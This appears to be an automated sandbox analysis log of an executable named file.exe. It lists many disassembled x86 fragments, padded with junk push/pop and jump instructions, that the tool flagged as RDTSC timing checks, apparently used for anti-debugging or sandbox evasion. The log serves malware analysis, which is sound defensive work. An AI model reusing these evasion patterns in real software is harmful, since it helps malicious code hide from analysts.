Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151A70A second address: 151A758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 jl 00007F27A8DEEC3Fh 0x0000000d jmp 00007F27A8DEEC39h 0x00000012 nop 0x00000013 or cx, 070Bh 0x00000018 push 00000004h 0x0000001a mov edx, eax 0x0000001c nop 0x0000001d jmp 00007F27A8DEEC37h 0x00000022 push eax 0x00000023 push ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 157BB4C second address: 157BB5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 157BB5A second address: 157BB62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 157BB62 second address: 157BB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 157BB66 second address: 157BB8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F27A8DEEC28h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007F27A8DEEC51h 0x00000014 jnc 00007F27A8DEEC2Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 157BB8A second address: 157BB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 157BCDE second address: 157BCE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 157C765 second address: 157C76A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 157C76A second address: 157C772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 157C772 second address: 157C7B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97D9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F27A8DB97CAh 0x00000011 jmp 00007F27A8DB97D3h 0x00000016 pop eax 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1584990 second address: 158499F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F27A8DEEC2Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 158499F second address: 15849C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jnc 00007F27A8DB97C6h 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15849C1 second address: 15849CF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F27A8DEEC28h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15849CF second address: 15849D9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F27A8DB97C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1582B02 second address: 1582B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1582B08 second address: 1582B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 158331D second address: 1583323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1583323 second address: 1583329 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 158361F second address: 1583625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1583625 second address: 1583629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1583629 second address: 1583645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F27A8DEEC2Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15838F3 second address: 15838F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15838F7 second address: 1583914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27A8DEEC2Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push ebx 0x0000000d pushad 0x0000000e jng 00007F27A8DEEC26h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1583E98 second address: 1583E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15846BF second address: 15846DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F27A8DEEC32h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15846DA second address: 15846DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1589376 second address: 158937A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 158937A second address: 1589380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1589380 second address: 1589386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1589386 second address: 158938C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 158C4B6 second address: 158C4BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 158C4BE second address: 158C4DB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F27A8DB97C6h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jmp 00007F27A8DB97CEh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 158C4DB second address: 158C51A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F27A8DEEC5Bh 0x0000000f ja 00007F27A8DEEC2Ah 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 jmp 00007F27A8DEEC2Fh 0x0000001d jmp 00007F27A8DEEC32h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 158C657 second address: 158C664 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F27A8DB97C8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 158C664 second address: 158C66A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 158CBB6 second address: 158CBBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 158CBBA second address: 158CBBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 158CE74 second address: 158CE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 158CE7B second address: 158CE81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1596DA1 second address: 1596DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F27A8DB97C6h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1596DAF second address: 1596DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1596DB4 second address: 1596DBE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F27A8DB97CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1596DBE second address: 1596DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F27A8DEEC54h 0x0000000c jmp 00007F27A8DEEC36h 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F27A8DEEC26h 0x00000019 jmp 00007F27A8DEEC2Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1594FFA second address: 1594FFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1594FFE second address: 1595007 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15955B1 second address: 15955CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27A8DB97D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15955CD second address: 15955E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F27A8DEEC26h 0x00000015 jno 00007F27A8DEEC26h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15955E8 second address: 15955EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1595850 second address: 1595854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1595854 second address: 159589F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a jnp 00007F27A8DB97DFh 0x00000010 jmp 00007F27A8DB97D9h 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 jmp 00007F27A8DB97D2h 0x0000001d push esi 0x0000001e pop esi 0x0000001f jno 00007F27A8DB97C6h 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 159589F second address: 15958A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1595B8D second address: 1595B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1595B98 second address: 1595B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1595B9C second address: 1595BA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1595BA0 second address: 1595BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1595D05 second address: 1595D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1595D11 second address: 1595D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15964F9 second address: 1596503 instructions: 0x00000000 rdtsc 0x00000002 js 00007F27A8DB97C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1596503 second address: 159650F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 159650F second address: 159651D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 159B073 second address: 159B07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F27A8DEEC26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 159B07D second address: 159B081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 159AEB3 second address: 159AEBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 159AEBC second address: 159AEC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 159AEC0 second address: 159AEC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 159E481 second address: 159E4AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F27A8DB97C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007F27A8DB97D6h 0x00000012 jnp 00007F27A8DB97C6h 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 159E4AB second address: 159E4FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC2Dh 0x00000007 jc 00007F27A8DEEC28h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jnp 00007F27A8DEEC26h 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F27A8DEEC35h 0x00000020 popad 0x00000021 pushad 0x00000022 jmp 00007F27A8DEEC36h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 159E4FD second address: 159E51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jne 00007F27A8DB97C6h 0x0000000e jnp 00007F27A8DB97C6h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 js 00007F27A8DB97D2h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15A8CC4 second address: 15A8CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15A8CC8 second address: 15A8CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F27A8DB97D0h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15A8CE6 second address: 15A8CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F27A8DEEC26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15A8CF2 second address: 15A8D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jg 00007F27A8DB97CEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15AB822 second address: 15AB837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F27A8DEEC26h 0x0000000f ja 00007F27A8DEEC26h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15AB3EB second address: 15AB3EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15ACDD2 second address: 15ACDE8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F27A8DEEC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F27A8DEEC2Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15ACDE8 second address: 15ACE08 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F27A8DB97D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15B050E second address: 15B0512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15B8467 second address: 15B8485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27A8DB97D6h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15B8485 second address: 15B8498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F27A8DEEC26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14D1D34 second address: 14D1D53 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F27A8DB97CFh 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F27A8DB97C6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14D1D53 second address: 14D1D57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C0C74 second address: 15C0C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C0C79 second address: 15C0C7E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C3C03 second address: 15C3C13 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F27A8DB97C6h 0x00000008 jbe 00007F27A8DB97C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C3C13 second address: 15C3C37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F27A8DEEC37h 0x0000000a jno 00007F27A8DEEC26h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15CA476 second address: 15CA47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15CA47E second address: 15CA483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C8EC4 second address: 15C8ECA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C944A second address: 15C9450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C9450 second address: 15C9454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C9454 second address: 15C9461 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F27A8DEEC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C9461 second address: 15C948B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27A8DB97D6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jc 00007F27A8DB97C6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C975C second address: 15C9763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15CA175 second address: 15CA179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15CA179 second address: 15CA18C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b jnl 00007F27A8DEEC26h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15CE086 second address: 15CE08D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15CE08D second address: 15CE0A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27A8DEEC2Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 160B49C second address: 160B4A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
